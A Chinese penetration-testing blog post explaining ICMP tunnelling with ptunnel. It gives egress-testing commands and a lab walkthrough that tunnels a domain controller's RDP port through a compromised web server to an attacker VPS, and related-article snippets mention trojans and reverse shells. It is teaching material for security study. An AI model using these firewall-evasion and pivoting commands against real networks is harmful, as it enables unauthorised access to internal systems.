【内网渗透】搭建隧道

最新推荐文章于 2025-04-10 21:06:44 发布
最新推荐文章于 2025-04-10 21:06:44 发布
阅读量2.9k 收藏 9
点赞数 3
分类专栏: 内网渗透 文章标签: 内网渗透 隧道
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44032232/article/details/114874562
版权

目录

0x001 隧道介绍

什么是隧道?

在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。

​在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道,ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙是不会屏蔽ping数据包的)

防火墙只允许ping出站流量,利用ptunnel建立ICMP隧道,从而实现传输数据。

为什么使用隧道?

在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截,CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等。

常用的隧道协议有哪些?

网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

0x002 网络传输应用层检测连通性

1. TCP 协议
用“瑞士军刀”——netcat
执行 nc 命令:nc <IP> <端口>

2. HTTP 协议
用“curl”工具,执行curl <IP地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的话,就会输出相应的端口信息

3. ICMP 协议
用“ping”命令,执行ping <IP地址/域名>

4. DNS 协议
检测DNS连通性常用的命令是“nslookup”和“dig”
nslookup 是windows自带的DNS探测命令
dig是linux系统自带的DNS探测命令

0x003 网络层ICMP隧道ptunnel使用

有如下网络:

攻击者IP:192.168.64.131     # kali
攻击者vps:47.79.137.177     # 阿里云主机   ubuntu

webserver:
	- 121.5.5.20       # 公网ip
	- 192.168.134.128  # 内网ip  centos
DC:
	- 192.168.134.30   # server2008

47.79.137.177 公网地址,192.168.134.128 内网地址。Web服务器模拟企业对外提供Web服务的机器,该机器可以通内网,同时向公网提供服务。内网存在一台Windows机器,Web服务器可以与该机器连接。现在我们获取到了Web服务器的权限,想用ICMP搭建通往内网的隧道,连接内网Windows的3389端口。

实现过程:

1、webserver 启动服务端./ptunnel -x mima
2、vps设置端口转发将DC的3389端口转发到vps上
3、攻击者使用kali连接vps ip+端口(安全组放行端口)

下面使用到工具:

ptunnel安装

#安装libpcap的依赖环境
apt -y install byacc
apt -y install flex bison

#安装libpcap依赖库
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar -xzvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
make && make install

#安装PingTunnel
wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install

#### centos系统把apt改成yum进行下载####

pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具

-p  跳板的公网IP
-lp 跳板机的监听端口
-da 目标服务器的内网IP
-dp 指定目标服务器的端口
-x  为隧道写一个隧道密码,防止隧道滥用

webserver:./ptunnel -x mima
vps:./ptunnel -p 47.79.137.177 -lp 1080 -da 192.168.134.30 -dp 3389 -x mima #转发的3389请求数据给本地1080
kali:rdesktop 47.79.137.177:1080   连接的是DC的远程桌面

老版本介绍:https://github.com/f1vefour/ptunnel(需自行编译)
新版本介绍:https://github.com/esrrhs/pingtunnel(二次开发版)

参考:https://www.cnblogs.com/appear001/p/13282873.html

内网渗透隧道搭建总结
admin的博客
05-17 258
原理:通过HTTP协议与代理服务器建立连接,协议信令中包含要连接到的远程主机的IP和端口,如果有需要身份验证的话还需要加上授权信息,服务器收到信令后首先进行身份验证,通过后便与远程主机建立连接,连接成功之后会返回给客户端200,表示验证通过。这里的隧道,就是一种绕过端口屏蔽的通信方式。原理:配置某个域名的NS服务器,使得对该域名的所有子域解析请求最终到达该NS服务器上,然后将另一个协议的数据编码为一系列DNS查询,响应时客户端将返回的Response数据进行解码得到另一协议的数据。
内网渗透隧道技术
imtech的博客
07-25 690
可以使用telnet协议,如果出现黑框就对了,证明TCP协议是通信的,其实还有一个最简单的办法,直接按照常规思路上传木马,如果无法连接就证明TCP协议被拦截了,CS木马都显示HTTP,在前面我就提到了,协议向下兼容的,TCP都封了,HTTP/S肯定是无法通信的,但是也有可能存在单独放开的可能。这里呢,就是像上面提到的需要使用到root权限,确实就是比较麻烦的了,除非你运气好获取到的root是弱口令,或者一些提权漏洞,不然确实比较难实现ssh隧道建立,至于后面需要输入的密码,就是你攻击机的密码。
内网渗透基础】二、隧道建立
最新发布
weixin_45597678的博客
04-10 480
内网隧道搭建
内网隧道搭建---内网渗透
Blanks的博客
01-17 1132
拿到低权限后就可以将一些小的渗透工具传到目标机器中,但是传输的隧道怎么搭建呢?netcat(nc瑞士绝刀)与powershell(ps)两种神器,正向搭建反向搭建了解原理得心应手,快来收藏学习!
内网渗透(二)——隧道搭建介绍
qq_61562251的博客
12-10 800
简单介绍了隧道的概念,超链接了常见的4种隧道搭建技术
2024年网络安全最新内网渗透之传输层隧道搭建_内网隧道工具lcx
2401_84297455的博客
05-03 1199
通过以下命令在本地监听端口,当有访问时会在命令行输出信息。在本地VPS主机中输入以下命令,开始监听并等待连接。一旦连接建立,数据将流入。在目标主机中输入以下命令,与VPS的333端口建立连接,并传输名为test.txt的文本文件。传输完成后,在VPS中打开1.txt文件,即可查看传输过来的数据。在本地VPS主机中输入以下命令,开始监听。在目标主机中输入以下命令,即可开始简易聊天。Shell 分为两种,一种是正向 Shell,另一种是反向 Shell。
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透
网络空间安全学习
05-30 1392
spp隧道代理工具支持的协议: TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic 支持类型: 正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理 协议和类型可以自由组合 外部代理协议和内部转发协议可以自由组合。 本工具使用简单,服务器、客户机各一条命令,就可建立连接。
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
2401_87966937的博客
01-19 1782
此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。客户端开启CS,配置监听器。CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
网络空间安全学习
05-28 2390
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
内网渗透| 隧道穿透的搭建从简单到高阶
MachineGunJoe666
06-19 1694
spp -name "test" -type proxy_client -server 服务器的ip -fromaddr :客户端木马端口 -toaddr :服务器端木马端口 -proxyproto tcp -proto ricmp。frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。转发规则 攻击机:5555 VPS:6000
2024年网络安全工程师必读的100本书籍
2303_79055586的博客
05-01 326
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。(都打包成一块的了,不能一一展开,总共300多集)因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
内网渗透之设置内网代理隧道
mudi13的博客
09-05 1687
只要能设置代理的工具 ,都可以使用。代理的端口设置在 CS服务器所在的主机
内网渗透之DNS隧道
没有网络安全就没有国家安全
03-07 1181
内网渗透之DNS隧道
ICMP隧道搭建
weixin_45007073的博客
04-09 1041
概述 ICMP隧道简单、实用,是一个比较特殊的协议。最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的ICMP请求。在一些网络环境中,如果攻击者使用各类上层隧道(HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙,实现不受限制的网络访问。 攻击演示 这里我们使用icmpsh这款工具完成演示,这个工具的下载地址为https://git
内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
墨痕诉清风的博客
02-24 4673
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。 .
内网安全【5】隧道搭建
LfanBQX的博客
06-27 1481
也就是说目标点击后门会把流量转发到跳板机的5566端口,然后转发到kali的6666端口,我们生成后门的时候生成5566端口的后门,好让目标去找跳板机,然后监听就监听本地的6666端口即可。这里我们在生成木马的时候,监听地址应该写跳板机的,因为利用反向连接,目标主机找不到内网攻击机,下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候,跳域名就会解析到刚才设置的攻击机的ip和端口。Frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。
内网安全攻防实战:渗透测试与法规解析
在进行内网渗透测试时,攻击者(在合法授权下)会使用各种工具和技术,例如虚拟机、Kali Linux、Windows渗透测试平台等,来模拟真实的攻击场景,找出网络中的弱点并提供修复建议。内网环境的构建,包括域环境和其它...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值